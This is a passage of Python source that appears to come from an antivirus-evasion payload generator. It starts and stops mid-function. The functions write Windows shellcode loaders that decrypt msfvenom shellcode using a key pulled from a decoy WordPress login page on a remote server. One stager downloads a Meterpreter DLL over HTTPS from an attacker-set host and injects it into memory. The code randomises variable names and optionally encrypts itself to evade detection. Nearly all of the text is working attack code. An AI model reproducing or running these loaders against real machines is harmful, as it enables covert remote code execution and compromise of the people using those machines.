<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://www.google.com" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
</p>
<p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
</div>
<div class="clear"></div>
</body></html>
"""
html_data += '<!--' + RandHttpstring + '-->'
html_data = str(html_data)
f.write(html_data)
f.close()
# encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function
(EncodedShellcode, secret) = encryption.encryptAES_http_request(
Shellcode, html_data)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'import time\n'
PayloadCode += 'import md5\n'
PayloadCode += 'import urllib2\n'
PayloadCode += 'opener = urllib2.build_opener()\n'
PayloadCode += 'opener.addheaders' + ' = ' '[(' + USER_AGENT + '\')]' '\n'
# Define Target Server "Key hosting server"
PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
PayloadCode += 'while True:\n'
PayloadCode += ' try:\n'
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
PayloadCode += ' ' + RandMD5 + ' = md5.new()\n'
PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep(' + self.required_options[
"SLEEP_TIME"][0] + ')\n'
PayloadCode += ' pass\n'
# Execute Shellcode inject
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(' + RandHttpKey + ')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
USER_AGENT = "User-Agent: " + self.required_options['USER_AGENT'][0]
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions
RandHttpstring = helpers.randomString()
# Genrate Random HTML code for webserver to host key file
f = open(
str(self.required_options["HTML_FILE_PATH"][0]) +
target_html_file, 'w')
html_data = """
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
<p>
<label for="user_login">Username<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://www.google.com" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
</p>
<p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
</div>
<div class="clear"></div>
</body></html>
"""
html_data += '<!--' + RandHttpstring + '-->'
html_data = str(html_data)
f.write(html_data)
f.close()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode, secret) = encryption.encryptAES_http_request(
Shellcode, html_data)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'import time\n'
PayloadCode += 'import md5\n'
PayloadCode += 'import urllib2\n'
PayloadCode += 'opener = urllib2.build_opener()\n'
PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n'
# Define Target Server "Key hosting server"
PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
PayloadCode += 'while True:\n'
PayloadCode += ' try:\n'
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
PayloadCode += ' ' + RandMD5 + ' = md5.new()\n'
PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep(' + self.required_options[
"SLEEP_TIME"][0] + ')\n'
PayloadCode += ' pass\n'
# Execute Shellcode inject
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
target_html_file = str(TARGET_SERVER.split('/')[-1])
USER_AGENT = "User-Agent: " + self.required_options[
'USER_AGENT'][0]
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandDecodeAES = helpers.randomString()
RandCipherObject = helpers.randomString()
RandDecodedShellcode = helpers.randomString()
RandShellCode = helpers.randomString()
RandPadding = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# Define Random Variable Names for HTTP functions
RandResponse = helpers.randomString()
RandHttpKey = helpers.randomString()
RandMD5 = helpers.randomString()
RandKeyServer = helpers.randomString()
RandSleep = helpers.randomString()
# Define Random Variable Names for HTML Functions
RandHttpstring = helpers.randomString()
# Genrate Random HTML code for webserver to host key file
f = open(
str(self.required_options["HTML_FILE_PATH"][0]) +
target_html_file, 'w')
html_data = """
<!DOCTYPE html>
<!--[if IE 8]>
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 8) ]><!-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
<form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
<p>
<label for="user_login">Username<br>
<input name="log" id="user_login" class="input" size="20" type="text"></label>
</p>
<p>
<label for="user_pass">Password<br>
<input name="pwd" id="user_pass" class="input" value="" size="20" type="password"></label>
</p>
<p class="forgetmenot"><label for="rememberme"><input name="rememberme" id="rememberme" value="forever" type="checkbox"> Remember Me</label></p>
<p class="submit">
<input name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" type="submit">
<input name="redirect_to" value="http://www.google.com" type="hidden">
<input name="testcookie" value="1" type="hidden">
</p>
</form>
<p id="nav">
<a rel="nofollow" href="http://www.google.com">Register</a> | <a href="http://www.google.com" title="Password Lost and Found">Lost your password?</a>
</p>
<p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
</div>
<div class="clear"></div>
</body></html>
"""
html_data += '<!--' + RandHttpstring + '-->'
html_data = str(html_data)
f.write(html_data)
f.close()
# encrypt the shellcode and grab the randomized key
(EncodedShellcode,
secret) = encryption.encryptAES_http_request(
Shellcode, html_data)
# Create Payload code
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += 'import time\n'
PayloadCode += 'import md5\n'
PayloadCode += 'import urllib2\n'
PayloadCode += 'opener = urllib2.build_opener()\n'
PayloadCode += 'opener.addheaders' + ' = ' '"' + USER_AGENT + '"' '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
# Define Target Server "Key hosting server"
PayloadCode += RandKeyServer + ' = ' '"' + TARGET_SERVER + '"' '\n'
PayloadCode += 'while True:\n'
PayloadCode += ' try:\n'
# Open Target Server with HTTP GET request
PayloadCode += ' ' + RandResponse + '= opener.open(' + RandKeyServer + ') \n'
# Check to see if server returns a 200 code or if not its most likely a 400 code
PayloadCode += ' if ' + RandResponse + '.code == 200:\n'
# Opening and requesting HTML from Target Server
PayloadCode += ' ' + RandHttpKey + ' = opener.open(' + RandKeyServer + ').read()\n'
PayloadCode += ' ' + RandMD5 + ' = md5.new()\n'
PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Genrate MD5 hash of HTML on page
PayloadCode += ' ' + RandMD5 + '.update(' + RandHttpKey + ')\n'
# Convert to 16 Byte Hex for AES functions
PayloadCode += ' ' + RandHttpKey + ' = ' + RandMD5 + '.hexdigest()\n'
# Convert to String for functions
PayloadCode += ' ' + RandHttpKey + ' = str(' + RandHttpKey + ')\n'
# Break out to decryption
PayloadCode += ' break\n'
# At any point it fails you will be in sleep for supplied time
PayloadCode += ' except URLError, e:\n'
PayloadCode += ' time.sleep(' + self.required_options[
"SLEEP_TIME"][0] + ')\n'
PayloadCode += ' pass\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"
# randomize everything, yo'
sumMethodName = helpers.randomString()
checkinMethodName = helpers.randomString()
randLettersName = helpers.randomString()
randLetterSubName = helpers.randomString()
randBaseName = helpers.randomString()
downloadMethodName = helpers.randomString()
hostName = helpers.randomString()
portName = helpers.randomString()
requestName = helpers.randomString()
tName = helpers.randomString()
injectMethodName = helpers.randomString()
dataName = helpers.randomString()
byteArrayName = helpers.randomString()
ptrName = helpers.randomString()
bufName = helpers.randomString()
handleName = helpers.randomString()
data2Name = helpers.randomString()
proxy_var = helpers.randomString()
opener_var = helpers.randomString()
# helper method that returns the sum of all ord values in a string % 0x100
payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)
# method that generates a new checksum value for checkin to the meterpreter handler
payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
# method that connects to a host/port over https and downloads the hosted data
payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
payloadCode += "\t" + proxy_var + " = urllib2.ProxyHandler()\n"
payloadCode += "\t" + opener_var + " = urllib2.build_opener(" + proxy_var + ")\n"
payloadCode += "\turllib2.install_opener(" + opener_var + ")\n"
payloadCode += "\t%s = urllib2.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" %(requestName, hostName, portName, checkinMethodName)
payloadCode += "\ttry:\n"
payloadCode += "\t\t%s = urllib2.urlopen(%s)\n" %(tName, requestName)
payloadCode += "\t\ttry:\n"
payloadCode += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" %(tName, tName)
payloadCode += "\t\t\telse: return ''\n"
payloadCode += "\t\texcept: return %s.read()\n" % (tName)
payloadCode += "\texcept urllib2.URLError, e: return ''\n"
# method to inject a reflective .dll into memory
payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
payloadCode += "\tif %s != \"\":\n" %(dataName)
payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)
# download the metpreter .dll and inject it
payloadCode += "%s = ''\n" %(data2Name)
payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)
if self.required_options["USE_PYHERION"][0].lower() == "y":
payloadCode = encryption.pyherion(payloadCode)
return payloadCode
def generate(self):
#Random letter substition variables
hex_letters = "abcdef"
non_hex_letters = "ghijklmnopqrstuvwxyz"
encode_with_this = random.choice(hex_letters)
decode_with_this = random.choice(non_hex_letters)
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
subbed_shellcode_variable_name = helpers.randomString()
shellcode_variable_name = helpers.randomString()
rand_ptr = helpers.randomString()
rand_buf = helpers.randomString()
rand_ht = helpers.randomString()
rand_decoded_letter = helpers.randomString()
rand_correct_letter = helpers.randomString()
rand_sub_scheme = helpers.randomString()
# Create Letter Substitution Scheme
sub_scheme = string.maketrans(encode_with_this, decode_with_this)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Create Payload File
payload_code = 'import ctypes\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
# Extra Variables
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# Create Payload File
payload_code = 'import ctypes\n'
payload_code += 'from string import maketrans\n'
payload_code += 'from datetime import datetime\n'
payload_code += 'from datetime import date\n\n'
payload_code += RandToday + ' = datetime.now()\n'
payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
if self.required_options["inject_method"][0].lower() == "heap":
if self.required_options["expire_payload"][0].lower() == "x":
HeapVar = helpers.randomString()
# Create Payload File
payload_code = 'import ctypes\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n'
payload_code += rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n'
payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = crypters.pyherion(payload_code)
return payload_code
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
# Extra Variables
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
HeapVar = helpers.randomString()
# Create Payload File
payload_code = 'import ctypes\n'
payload_code += 'from string import maketrans\n'
payload_code += 'from datetime import datetime\n'
payload_code += 'from datetime import date\n\n'
payload_code += RandToday + ' = datetime.now()\n'
payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n'
payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n'
payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = crypters.pyherion(payload_code)
return payload_code
else:
if self.required_options["expire_payload"][0].lower() == "x":
#Additional random variable names
rand_reverse_shell = helpers.randomString()
rand_memory_shell = helpers.randomString()
rand_shellcode = helpers.randomString()
# Create Payload File
payload_code = 'from ctypes import *\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
payload_code += rand_shellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
return payload_code
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(
days=int(self.required_options["expire_payload"][0])))
# Extra Variables
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
#Additional random variable names
rand_reverse_shell = helpers.randomString()
rand_memory_shell = helpers.randomString()
rand_shellcode = helpers.randomString()
# Create Payload File
payload_code = 'from ctypes import *\n'
payload_code += 'from string import maketrans\n'
payload_code += 'from datetime import datetime\n'
payload_code += 'from datetime import date\n\n'
